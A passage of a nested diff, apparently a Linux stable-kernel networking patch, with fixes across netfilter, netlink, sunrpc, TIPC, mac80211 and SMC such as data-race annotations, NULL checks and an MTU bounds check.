+-				  (sk->sk_shutdown & RCV_SHUTDOWN) ||
++				  (READ_ONCE(sk->sk_shutdown) & RCV_SHUTDOWN) ||
+ 				  (!llc_data_accept_state(llc->state) &&
+ 				   !llc->remote_busy_flag &&
+ 				   !llc->p_flag), &wait))
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index e8beec0a0ae1c..06b9df2fbcd77 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1477,9 +1477,10 @@ static int ieee80211_stop_ap(struct wiphy *wiphy, struct net_device *dev,
+ 		sdata_dereference(link->u.ap.unsol_bcast_probe_resp,
+ 				  sdata);
+ 
+-	/* abort any running channel switch */
++	/* abort any running channel switch or color change */
+ 	mutex_lock(&local->mtx);
+ 	link_conf->csa_active = false;
++	link_conf->color_change_active = false;
+ 	if (link->csa_block_tx) {
+ 		ieee80211_wake_vif_queues(local, sdata,
+ 					  IEEE80211_QUEUE_STOP_REASON_CSA);
+diff --git a/net/mac80211/trace.h b/net/mac80211/trace.h
+index 9f4377566c425..c85367a4757a9 100644
+--- a/net/mac80211/trace.h
++++ b/net/mac80211/trace.h
+@@ -67,7 +67,7 @@
+ 			__entry->min_freq_offset = (c)->chan ? (c)->chan->freq_offset : 0;	\
+ 			__entry->min_chan_width = (c)->width;				\
+ 			__entry->min_center_freq1 = (c)->center_freq1;			\
+-			__entry->freq1_offset = (c)->freq1_offset;			\
++			__entry->min_freq1_offset = (c)->freq1_offset;			\
+ 			__entry->min_center_freq2 = (c)->center_freq2;
+ #define MIN_CHANDEF_PR_FMT	" min_control:%d.%03d MHz min_width:%d min_center: %d.%03d/%d MHz"
+ #define MIN_CHANDEF_PR_ARG	__entry->min_control_freq, __entry->min_freq_offset,	\
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 6a1708db652f2..763cefd0cc268 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -3718,6 +3718,7 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 	ieee80211_tx_result r;
+ 	struct ieee80211_vif *vif = txq->vif;
+ 	int q = vif->hw_queue[txq->ac];
++	unsigned long flags;
+ 	bool q_stopped;
+ 
+ 	WARN_ON_ONCE(softirq_count() == 0);
+@@ -3726,9 +3727,9 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 		return NULL;
+ 
+ begin:
+-	spin_lock(&local->queue_stop_reason_lock);
++	spin_lock_irqsave(&local->queue_stop_reason_lock, flags);
+ 	q_stopped = local->queue_stop_reasons[q];
+-	spin_unlock(&local->queue_stop_reason_lock);
++	spin_unlock_irqrestore(&local->queue_stop_reason_lock, flags);
+ 
+ 	if (unlikely(q_stopped)) {
+ 		/* mark for waking later */
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 6e80f0f6149ea..55a7f72d547cd 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -699,9 +699,11 @@ void nf_conntrack_destroy(struct nf_conntrack *nfct)
+ 
+ 	rcu_read_lock();
+ 	ct_hook = rcu_dereference(nf_ct_hook);
+-	BUG_ON(ct_hook == NULL);
+-	ct_hook->destroy(nfct);
++	if (ct_hook)
++		ct_hook->destroy(nfct);
+ 	rcu_read_unlock();
++
++	WARN_ON(!ct_hook);
+ }
+ EXPORT_SYMBOL(nf_conntrack_destroy);
+ 
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index 4963fec815da3..d4fe7bb4f853a 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -603,7 +603,7 @@ static void ip_vs_sync_conn_v0(struct netns_ipvs *ipvs, struct ip_vs_conn *cp,
+ 	if (cp->flags & IP_VS_CONN_F_SEQ_MASK) {
+ 		struct ip_vs_sync_conn_options *opt =
+ 			(struct ip_vs_sync_conn_options *)&s[1];
+-		memcpy(opt, &cp->in_seq, sizeof(*opt));
++		memcpy(opt, &cp->sync_conn_opt, sizeof(*opt));
+ 	}
+ 
+ 	m->nr_conns++;
+diff --git a/net/netfilter/nf_conntrack_standalone.c b/net/netfilter/nf_conntrack_standalone.c
+index 460294bd4b606..52245dbfae311 100644
+--- a/net/netfilter/nf_conntrack_standalone.c
++++ b/net/netfilter/nf_conntrack_standalone.c
+@@ -1222,11 +1222,12 @@ static int __init nf_conntrack_standalone_init(void)
+ 	nf_conntrack_htable_size_user = nf_conntrack_htable_size;
+ #endif
+ 
++	nf_conntrack_init_end();
++
+ 	ret = register_pernet_subsys(&nf_conntrack_net_ops);
+ 	if (ret < 0)
+ 		goto out_pernet;
+ 
+-	nf_conntrack_init_end();
+ 	return 0;
+ 
+ out_pernet:
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index f663262df6987..31775d54f4b40 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3692,12 +3692,10 @@ static struct nft_rule *nft_rule_lookup_byid(const struct net *net,
+ 	struct nft_trans *trans;
+ 
+ 	list_for_each_entry(trans, &nft_net->commit_list, list) {
+-		struct nft_rule *rule = nft_trans_rule(trans);
+-
+ 		if (trans->msg_type == NFT_MSG_NEWRULE &&
+ 		    trans->ctx.chain == chain &&
+ 		    id == nft_trans_rule_id(trans))
+-			return rule;
++			return nft_trans_rule(trans);
+ 	}
+ 	return ERR_PTR(-ENOENT);
+ }
+diff --git a/net/netfilter/nft_chain_filter.c b/net/netfilter/nft_chain_filter.c
+index c3563f0be2692..680fe557686e4 100644
+--- a/net/netfilter/nft_chain_filter.c
++++ b/net/netfilter/nft_chain_filter.c
+@@ -344,6 +344,12 @@ static void nft_netdev_event(unsigned long event, struct net_device *dev,
+ 		return;
+ 	}
+ 
++	/* UNREGISTER events are also happening on netns exit.
++	 *
++	 * Although nf_tables core releases all tables/chains, only this event
++	 * handler provides guarantee that hook->ops.dev is still accessible,
++	 * so we cannot skip exiting net namespaces.
++	 */
+ 	__nft_release_basechain(ctx);
+ }
+ 
+@@ -362,9 +368,6 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 	    event != NETDEV_CHANGENAME)
+ 		return NOTIFY_DONE;
+ 
+-	if (!check_net(ctx.net))
+-		return NOTIFY_DONE;
+-
+ 	nft_net = nft_pernet(ctx.net);
+ 	mutex_lock(&nft_net->commit_mutex);
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 19ea4d3c35535..2f114aa10f1a7 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -221,7 +221,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+-	struct nft_rbtree_elem *rbe_prev;
++	struct nft_rbtree_elem *rbe_prev = NULL;
+ 	struct nft_set_gc_batch *gcb;
+ 
+ 	gcb = nft_set_gc_batch_check(set, NULL, GFP_ATOMIC);
+@@ -229,17 +229,21 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 		return -ENOMEM;
+ 
+ 	/* search for expired end interval coming before this element. */
+-	do {
++	while (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+ 		if (nft_rbtree_interval_end(rbe_prev))
+ 			break;
+ 
+ 		prev = rb_prev(prev);
+-	} while (prev != NULL);
++	}
++
++	if (rbe_prev) {
++		rb_erase(&rbe_prev->node, &priv->root);
++		atomic_dec(&set->nelems);
++	}
+ 
+-	rb_erase(&rbe_prev->node, &priv->root);
+ 	rb_erase(&rbe->node, &priv->root);
+-	atomic_sub(2, &set->nelems);
++	atomic_dec(&set->nelems);
+ 
+ 	nft_set_gc_batch_add(gcb, rbe);
+ 	nft_set_gc_batch_complete(gcb);
+@@ -268,7 +272,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 			       struct nft_set_ext **ext)
+ {
+ 	struct nft_rbtree_elem *rbe, *rbe_le = NULL, *rbe_ge = NULL;
+-	struct rb_node *node, *parent, **p, *first = NULL;
++	struct rb_node *node, *next, *parent, **p, *first = NULL;
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 genmask = nft_genmask_next(net);
+ 	int d, err;
+@@ -307,7 +311,9 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	 * Values stored in the tree are in reversed order, starting from
+ 	 * highest to lowest value.
+ 	 */
+-	for (node = first; node != NULL; node = rb_next(node)) {
++	for (node = first; node != NULL; node = next) {
++		next = rb_next(node);
++
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
+ 		if (!nft_set_elem_active(&rbe->ext, genmask))
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index b1dcc536521b6..d1b19618890b7 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1979,7 +1979,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	skb_free_datagram(sk, skb);
+ 
+-	if (nlk->cb_running &&
++	if (READ_ONCE(nlk->cb_running) &&
+ 	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf / 2) {
+ 		ret = netlink_dump(sk);
+ 		if (ret) {
+@@ -2293,7 +2293,7 @@ static int netlink_dump(struct sock *sk)
+ 	if (cb->done)
+ 		cb->done(cb);
+ 
+-	nlk->cb_running = false;
++	WRITE_ONCE(nlk->cb_running, false);
+ 	module = cb->module;
+ 	skb = cb->skb;
+ 	mutex_unlock(nlk->cb_mutex);
+@@ -2356,7 +2356,7 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 			goto error_put;
+ 	}
+ 
+-	nlk->cb_running = true;
++	WRITE_ONCE(nlk->cb_running, true);
+ 	nlk->dump_done_errno = INT_MAX;
+ 
+ 	mutex_unlock(nlk->cb_mutex);
+@@ -2681,7 +2681,7 @@ static int netlink_native_seq_show(struct seq_file *seq, void *v)
+ 			   nlk->groups ? (u32)nlk->groups[0] : 0,
+ 			   sk_rmem_alloc_get(s),
+ 			   sk_wmem_alloc_get(s),
+-			   nlk->cb_running,
++			   READ_ONCE(nlk->cb_running),
+ 			   refcount_read(&s->sk_refcnt),
+ 			   atomic_read(&s->sk_drops),
+ 			   sock_i_ino(s)
+diff --git a/net/nsh/nsh.c b/net/nsh/nsh.c
+index e9ca007718b7e..0f23e5e8e03eb 100644
+--- a/net/nsh/nsh.c
++++ b/net/nsh/nsh.c
+@@ -77,13 +77,12 @@ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 				       netdev_features_t features)
+ {
+ 	struct sk_buff *segs = ERR_PTR(-EINVAL);
++	u16 mac_offset = skb->mac_header;
+ 	unsigned int nsh_len, mac_len;
+ 	__be16 proto;
+-	int nhoff;
+ 
+ 	skb_reset_network_header(skb);
+ 
+-	nhoff = skb->network_header - skb->mac_header;
+ 	mac_len = skb->mac_len;
+ 
+ 	if (unlikely(!pskb_may_pull(skb, NSH_BASE_HDR_LEN)))
+@@ -108,15 +107,14 @@ static struct sk_buff *nsh_gso_segment(struct sk_buff *skb,
+ 	segs = skb_mac_gso_segment(skb, features);
+ 	if (IS_ERR_OR_NULL(segs)) {
+ 		skb_gso_error_unwind(skb, htons(ETH_P_NSH), nsh_len,
+-				     skb->network_header - nhoff,
+-				     mac_len);
++				     mac_offset, mac_len);
+ 		goto out;
+ 	}
+ 
+ 	for (skb = segs; skb; skb = skb->next) {
+ 		skb->protocol = htons(ETH_P_NSH);
+ 		__skb_push(skb, nsh_len);
+-		skb_set_mac_header(skb, -nhoff);
++		skb->mac_header = mac_offset;
+ 		skb->network_header = skb->mac_header + mac_len;
+ 		skb->mac_len = mac_len;
+ 	}
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 2af2ab924d64a..67771b0f57719 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -1936,10 +1936,8 @@ static void packet_parse_headers(struct sk_buff *skb, struct socket *sock)
+ 	/* Move network header to the right position for VLAN tagged packets */
+ 	if (likely(skb->dev->type == ARPHRD_ETHER) &&
+ 	    eth_type_vlan(skb->protocol) &&
+-	    __vlan_get_protocol(skb, skb->protocol, &depth) != 0) {
+-		if (pskb_may_pull(skb, depth))
+-			skb_set_network_header(skb, depth);
+-	}
++	    vlan_get_protocol_and_depth(skb, skb->protocol, &depth) != 0)
++		skb_set_network_header(skb, depth);
+ 
+ 	skb_probe_transport_header(skb);
+ }
+diff --git a/net/smc/smc_close.c b/net/smc/smc_close.c
+index 31db7438857c9..dbdf03e8aa5b5 100644
+--- a/net/smc/smc_close.c
++++ b/net/smc/smc_close.c
+@@ -67,8 +67,8 @@ static void smc_close_stream_wait(struct smc_sock *smc, long timeout)
+ 
+ 		rc = sk_wait_event(sk, &timeout,
+ 				   !smc_tx_prepared_sends(&smc->conn) ||
+-				   sk->sk_err == ECONNABORTED ||
+-				   sk->sk_err == ECONNRESET ||
++				   READ_ONCE(sk->sk_err) == ECONNABORTED ||
++				   READ_ONCE(sk->sk_err) == ECONNRESET ||
+ 				   smc->conn.killed,
+ 				   &wait);
+ 		if (rc)
+diff --git a/net/smc/smc_rx.c b/net/smc/smc_rx.c
+index 17c5aee7ee4f2..ffcc9996a3da3 100644
+--- a/net/smc/smc_rx.c
++++ b/net/smc/smc_rx.c
+@@ -263,9 +263,9 @@ int smc_rx_wait(struct smc_sock *smc, long *timeo,
+ 	sk_set_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	rc = sk_wait_event(sk, timeo,
+-			   sk->sk_err ||
++			   READ_ONCE(sk->sk_err) ||
+ 			   cflags->peer_conn_abort ||
+-			   sk->sk_shutdown & RCV_SHUTDOWN ||
++			   READ_ONCE(sk->sk_shutdown) & RCV_SHUTDOWN ||
+ 			   conn->killed ||
+ 			   fcrit(conn),
+ 			   &wait);
+diff --git a/net/smc/smc_tx.c b/net/smc/smc_tx.c
+index f4b6a71ac488a..45128443f1f10 100644
+--- a/net/smc/smc_tx.c
++++ b/net/smc/smc_tx.c
+@@ -113,8 +113,8 @@ static int smc_tx_wait(struct smc_sock *smc, int flags)
+ 			break; /* at least 1 byte of free & no urgent data */
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk_wait_event(sk, &timeo,
+-			      sk->sk_err ||
+-			      (sk->sk_shutdown & SEND_SHUTDOWN) ||
++			      READ_ONCE(sk->sk_err) ||
++			      (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
+ 			      smc_cdc_rxed_any_close(conn) ||
+ 			      (atomic_read(&conn->sndbuf_space) &&
+ 			       !conn->urg_tx_pend),
+diff --git a/net/socket.c b/net/socket.c
+index 577079a8935fa..c2e0a22f16d9b 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -2890,7 +2890,7 @@ static int do_recvmmsg(int fd, struct mmsghdr __user *mmsg,
+ 		 * error to return on the next call or if the
+ 		 * app asks about it using getsockopt(SO_ERROR).
+ 		 */
+-		sock->sk->sk_err = -err;
++		WRITE_ONCE(sock->sk->sk_err, -err);
+ 	}
+ out_put:
+ 	fput_light(sock->file, fput_needed);
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 9ee32e06f877e..9b0b21cccca9a 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -1007,7 +1007,7 @@ static int __svc_register(struct net *net, const char *progname,
+ #endif
+ 	}
+ 
+-	trace_svc_register(progname, version, protocol, port, family, error);
++	trace_svc_register(progname, version, family, protocol, port, error);
+ 	return error;
+ }
+ 
+diff --git a/net/sunrpc/svc_xprt.c b/net/sunrpc/svc_xprt.c
+index c2ce125380080..8117d0e08d5a2 100644
+--- a/net/sunrpc/svc_xprt.c
++++ b/net/sunrpc/svc_xprt.c
+@@ -534,13 +534,23 @@ void svc_reserve(struct svc_rqst *rqstp, int space)
+ }
+ EXPORT_SYMBOL_GPL(svc_reserve);
+ 
++static void free_deferred(struct svc_xprt *xprt, struct svc_deferred_req *dr)
++{
++	if (!dr)
++		return;
++
++	xprt->xpt_ops->xpo_release_ctxt(xprt, dr->xprt_ctxt);
++	kfree(dr);
++}
++
+ static void svc_xprt_release(struct svc_rqst *rqstp)
+ {
+ 	struct svc_xprt	*xprt = rqstp->rq_xprt;
+ 
+-	xprt->xpt_ops->xpo_release_rqst(rqstp);
++	xprt->xpt_ops->xpo_release_ctxt(xprt, rqstp->rq_xprt_ctxt);
++	rqstp->rq_xprt_ctxt = NULL;
+ 
+-	kfree(rqstp->rq_deferred);
++	free_deferred(xprt, rqstp->rq_deferred);
+ 	rqstp->rq_deferred = NULL;
+ 
+ 	pagevec_release(&rqstp->rq_pvec);
+@@ -1059,7 +1069,7 @@ static void svc_delete_xprt(struct svc_xprt *xprt)
+ 	spin_unlock_bh(&serv->sv_lock);
+ 
+ 	while ((dr = svc_deferred_dequeue(xprt)) != NULL)
+-		kfree(dr);
++		free_deferred(xprt, dr);
+ 
+ 	call_xpt_users(xprt);
+ 	svc_xprt_put(xprt);
+@@ -1181,8 +1191,8 @@ static void svc_revisit(struct cache_deferred_req *dreq, int too_many)
+ 	if (too_many || test_bit(XPT_DEAD, &xprt->xpt_flags)) {
+ 		spin_unlock(&xprt->xpt_lock);
+ 		trace_svc_defer_drop(dr);
++		free_deferred(xprt, dr);
+ 		svc_xprt_put(xprt);
+-		kfree(dr);
+ 		return;
+ 	}
+ 	dr->xprt = NULL;
+@@ -1227,14 +1237,14 @@ static struct cache_deferred_req *svc_defer(struct cache_req *req)
+ 		dr->addrlen = rqstp->rq_addrlen;
+ 		dr->daddr = rqstp->rq_daddr;
+ 		dr->argslen = rqstp->rq_arg.len >> 2;
+-		dr->xprt_ctxt = rqstp->rq_xprt_ctxt;
+-		rqstp->rq_xprt_ctxt = NULL;
+ 
+ 		/* back up head to the start of the buffer and copy */
+ 		skip = rqstp->rq_arg.len - rqstp->rq_arg.head[0].iov_len;
+ 		memcpy(dr->args, rqstp->rq_arg.head[0].iov_base - skip,
+ 		       dr->argslen << 2);
+ 	}
++	dr->xprt_ctxt = rqstp->rq_xprt_ctxt;
++	rqstp->rq_xprt_ctxt = NULL;
+ 	trace_svc_defer(rqstp);
+ 	svc_xprt_get(rqstp->rq_xprt);
+ 	dr->xprt = rqstp->rq_xprt;
+@@ -1267,6 +1277,8 @@ static noinline int svc_deferred_recv(struct svc_rqst *rqstp)
+ 	rqstp->rq_daddr       = dr->daddr;
+ 	rqstp->rq_respages    = rqstp->rq_pages;
+ 	rqstp->rq_xprt_ctxt   = dr->xprt_ctxt;
++
++	dr->xprt_ctxt = NULL;
+ 	svc_xprt_received(rqstp->rq_xprt);
+ 	return dr->argslen << 2;
+ }
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index 815baf308236a..7107fbcbff343 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -111,27 +111,27 @@ static void svc_reclassify_socket(struct socket *sock)
+ #endif
+ 
+ /**
+- * svc_tcp_release_rqst - Release transport-related resources
+- * @rqstp: request structure with resources to be released
++ * svc_tcp_release_ctxt - Release transport-related resources
++ * @xprt: the transport which owned the context
++ * @ctxt: the context from rqstp->rq_xprt_ctxt or dr->xprt_ctxt
+  *
+  */
+-static void svc_tcp_release_rqst(struct svc_rqst *rqstp)
++static void svc_tcp_release_ctxt(struct svc_xprt *xprt, void *ctxt)
+ {
+ }
+ 
+ /**
+- * svc_udp_release_rqst - Release transport-related resources
+- * @rqstp: request structure with resources to be released
++ * svc_udp_release_ctxt - Release transport-related resources
++ * @xprt: the transport which owned the context
++ * @ctxt: the context from rqstp->rq_xprt_ctxt or dr->xprt_ctxt
+  *
+  */
+-static void svc_udp_release_rqst(struct svc_rqst *rqstp)
++static void svc_udp_release_ctxt(struct svc_xprt *xprt, void *ctxt)
+ {
+-	struct sk_buff *skb = rqstp->rq_xprt_ctxt;
++	struct sk_buff *skb = ctxt;
+ 
+-	if (skb) {
+-		rqstp->rq_xprt_ctxt = NULL;
++	if (skb)
+ 		consume_skb(skb);
+-	}
+ }
+ 
+ union svc_pktinfo_u {
+@@ -559,7 +559,8 @@ static int svc_udp_sendto(struct svc_rqst *rqstp)
+ 	unsigned int sent;
+ 	int err;
+ 
+-	svc_udp_release_rqst(rqstp);
++	svc_udp_release_ctxt(xprt, rqstp->rq_xprt_ctxt);
++	rqstp->rq_xprt_ctxt = NULL;
+ 
+ 	svc_set_cmsg_data(rqstp, cmh);
+ 
+@@ -631,7 +632,7 @@ static const struct svc_xprt_ops svc_udp_ops = {
+ 	.xpo_recvfrom = svc_udp_recvfrom,
+ 	.xpo_sendto = svc_udp_sendto,
+ 	.xpo_result_payload = svc_sock_result_payload,
+-	.xpo_release_rqst = svc_udp_release_rqst,
++	.xpo_release_ctxt = svc_udp_release_ctxt,
+ 	.xpo_detach = svc_sock_detach,
+ 	.xpo_free = svc_sock_free,
+ 	.xpo_has_wspace = svc_udp_has_wspace,
+@@ -1159,7 +1160,8 @@ static int svc_tcp_sendto(struct svc_rqst *rqstp)
+ 	unsigned int sent;
+ 	int err;
+ 
+-	svc_tcp_release_rqst(rqstp);
++	svc_tcp_release_ctxt(xprt, rqstp->rq_xprt_ctxt);
++	rqstp->rq_xprt_ctxt = NULL;
+ 
+ 	atomic_inc(&svsk->sk_sendqlen);
+ 	mutex_lock(&xprt->xpt_mutex);
+@@ -1204,7 +1206,7 @@ static const struct svc_xprt_ops svc_tcp_ops = {
+ 	.xpo_recvfrom = svc_tcp_recvfrom,
+ 	.xpo_sendto = svc_tcp_sendto,
+ 	.xpo_result_payload = svc_sock_result_payload,
+-	.xpo_release_rqst = svc_tcp_release_rqst,
++	.xpo_release_ctxt = svc_tcp_release_ctxt,
+ 	.xpo_detach = svc_tcp_sock_detach,
+ 	.xpo_free = svc_sock_free,
+ 	.xpo_has_wspace = svc_tcp_has_wspace,
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+index 5242ad121450b..53a7cb2f6c07d 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+@@ -239,21 +239,20 @@ void svc_rdma_recv_ctxt_put(struct svcxprt_rdma *rdma,
+ }
+ 
+ /**
+- * svc_rdma_release_rqst - Release transport-specific per-rqst resources
+- * @rqstp: svc_rqst being released
++ * svc_rdma_release_ctxt - Release transport-specific per-rqst resources
++ * @xprt: the transport which owned the context
++ * @vctxt: the context from rqstp->rq_xprt_ctxt or dr->xprt_ctxt
+  *
+  * Ensure that the recv_ctxt is released whether or not a Reply
+  * was sent. For example, the client could close the connection,
+  * or svc_process could drop an RPC, before the Reply is sent.
+  */
+-void svc_rdma_release_rqst(struct svc_rqst *rqstp)
++void svc_rdma_release_ctxt(struct svc_xprt *xprt, void *vctxt)
+ {
+-	struct svc_rdma_recv_ctxt *ctxt = rqstp->rq_xprt_ctxt;
+-	struct svc_xprt *xprt = rqstp->rq_xprt;
++	struct svc_rdma_recv_ctxt *ctxt = vctxt;
+ 	struct svcxprt_rdma *rdma =
+ 		container_of(xprt, struct svcxprt_rdma, sc_xprt);
+ 
+-	rqstp->rq_xprt_ctxt = NULL;
+ 	if (ctxt)
+ 		svc_rdma_recv_ctxt_put(rdma, ctxt);
+ }
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_transport.c b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+index 94b20fb471356..f776f0cb471f0 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_transport.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+@@ -81,7 +81,7 @@ static const struct svc_xprt_ops svc_rdma_ops = {
+ 	.xpo_recvfrom = svc_rdma_recvfrom,
+ 	.xpo_sendto = svc_rdma_sendto,
+ 	.xpo_result_payload = svc_rdma_result_payload,
+-	.xpo_release_rqst = svc_rdma_release_rqst,
++	.xpo_release_ctxt = svc_rdma_release_ctxt,
+ 	.xpo_detach = svc_rdma_detach,
+ 	.xpo_free = svc_rdma_free,
+ 	.xpo_has_wspace = svc_rdma_has_wspace,
+diff --git a/net/tipc/bearer.c b/net/tipc/bearer.c
+index 35cac7733fd3a..53881406e2006 100644
+--- a/net/tipc/bearer.c
++++ b/net/tipc/bearer.c
+@@ -541,6 +541,19 @@ int tipc_bearer_mtu(struct net *net, u32 bearer_id)
+ 	return mtu;
+ }
+ 
++int tipc_bearer_min_mtu(struct net *net, u32 bearer_id)
++{
++	int mtu = TIPC_MIN_BEARER_MTU;
++	struct tipc_bearer *b;
++
++	rcu_read_lock();
++	b = bearer_get(net, bearer_id);
++	if (b)
++		mtu += b->encap_hlen;
++	rcu_read_unlock();
++	return mtu;
++}
++
+ /* tipc_bearer_xmit_skb - sends buffer to destination over bearer
+  */
+ void tipc_bearer_xmit_skb(struct net *net, u32 bearer_id,
+@@ -1138,8 +1151,8 @@ int __tipc_nl_bearer_set(struct sk_buff *skb, struct genl_info *info)
+ 				return -EINVAL;
+ 			}
+ #ifdef CONFIG_TIPC_MEDIA_UDP
+-			if (tipc_udp_mtu_bad(nla_get_u32
+-					     (props[TIPC_NLA_PROP_MTU]))) {
++			if (nla_get_u32(props[TIPC_NLA_PROP_MTU]) <
++			    b->encap_hlen + TIPC_MIN_BEARER_MTU) {
+ 				NL_SET_ERR_MSG(info->extack,
+ 					       "MTU value is out-of-range");
+ 				return -EINVAL;
+diff --git a/net/tipc/bearer.h b/net/tipc/bearer.h
+index 490ad6e5f7a3c..bd0cc5c287ef8 100644
+--- a/net/tipc/bearer.h
++++ b/net/tipc/bearer.h
+@@ -146,6 +146,7 @@ struct tipc_media {
+  * @identity: array index of this bearer within TIPC bearer array
+  * @disc: ptr to link setup request
+  * @net_plane: network plane ('A' through 'H') currently associated with bearer
++ * @encap_hlen: encap headers length
+  * @up: bearer up flag (bit 0)
+  * @refcnt: tipc_bearer reference counter
+  *
+@@ -170,6 +171,7 @@ struct tipc_bearer {
+ 	u32 identity;
+ 	struct tipc_discoverer *disc;
+ 	char net_plane;
++	u16 encap_hlen;
+ 	unsigned long up;
+ 	refcount_t refcnt;
+ };
+@@ -232,6 +234,7 @@ int tipc_bearer_setup(void);
+ void tipc_bearer_cleanup(void);
+ void tipc_bearer_stop(struct net *net);
+ int tipc_bearer_mtu(struct net *net, u32 bearer_id);
++int tipc_bearer_min_mtu(struct net *net, u32 bearer_id);
+ bool tipc_bearer_bcast_support(struct net *net, u32 bearer_id);
+ void tipc_bearer_xmit_skb(struct net *net, u32 bearer_id,
+ 			  struct sk_buff *skb,
+diff --git a/net/tipc/link.c b/net/tipc/link.c
+index b3ce24823f503..2eff1c7949cbc 100644
+--- a/net/tipc/link.c
++++ b/net/tipc/link.c
+@@ -2200,7 +2200,7 @@ static int tipc_link_proto_rcv(struct tipc_link *l, struct sk_buff *skb,
+ 	struct tipc_msg *hdr = buf_msg(skb);
+ 	struct tipc_gap_ack_blks *ga = NULL;
+ 	bool reply = msg_probe(hdr), retransmitted = false;
+-	u32 dlen = msg_data_sz(hdr), glen = 0;
++	u32 dlen = msg_data_sz(hdr), glen = 0, msg_max;
+ 	u16 peers_snd_nxt =  msg_next_sent(hdr);
+ 	u16 peers_tol = msg_link_tolerance(hdr);
+ 	u16 peers_prio = msg_linkprio(hdr);
+@@ -2239,6 +2239,9 @@ static int tipc_link_proto_rcv(struct tipc_link *l, struct sk_buff *skb,
+ 	switch (mtyp) {
+ 	case RESET_MSG:
+ 	case ACTIVATE_MSG:
++		msg_max = msg_max_pkt(hdr);
++		if (msg_max < tipc_bearer_min_mtu(l->net, l->bearer_id))
++			break;
+ 		/* Complete own link name with peer's interface name */
+ 		if_name =  strrchr(l->name, ':') + 1;
+ 		if (sizeof(l->name) - (if_name - l->name) <= TIPC_MAX_IF_NAME)
+@@ -2283,8 +2286,8 @@ static int tipc_link_proto_rcv(struct tipc_link *l, struct sk_buff *skb,
+ 		l->peer_session = msg_session(hdr);
+ 		l->in_session = true;
+ 		l->peer_bearer_id = msg_bearer_id(hdr);
+-		if (l->mtu > msg_max_pkt(hdr))
+-			l->mtu = msg_max_pkt(hdr);
++		if (l->mtu > msg_max)
++			l->mtu = msg_max;
+ 		break;
+ 
+ 	case STATE_MSG:
+diff --git a/net/tipc/socket.c b/net/tipc/socket.c
+index ff5bb9e4731c4..14027a7a7bef8 100644
+--- a/net/tipc/socket.c
++++ b/net/tipc/socket.c
+@@ -313,9 +313,9 @@ static void tsk_rej_rx_queue(struct sock *sk, int error)
+ 		tipc_sk_respond(sk, skb, error);
+ }
+ 
+-static bool tipc_sk_connected(struct sock *sk)
++static bool tipc_sk_connected(const struct sock *sk)
+ {
+-	return sk->sk_state == TIPC_ESTABLISHED;
++	return READ_ONCE(sk->sk_state) == TIPC_ESTABLISHED;
+ }
+ 
+ /* tipc_sk_type_connectionless - check if the socket is datagram socket
+diff --git a/net/tipc/udp_media.c b/net/tipc/udp_media.c
+index c2bb818704c8f..0a85244fd6188 100644
+--- a/net/tipc/udp_media.c
++++ b/net/tipc/udp_media.c
+@@ -738,8 +738,8 @@ static int tipc_udp_enable(struct net *net, struct tipc_bearer *b,
+ 			udp_conf.local_ip.s_addr = local.ipv4.s_addr;
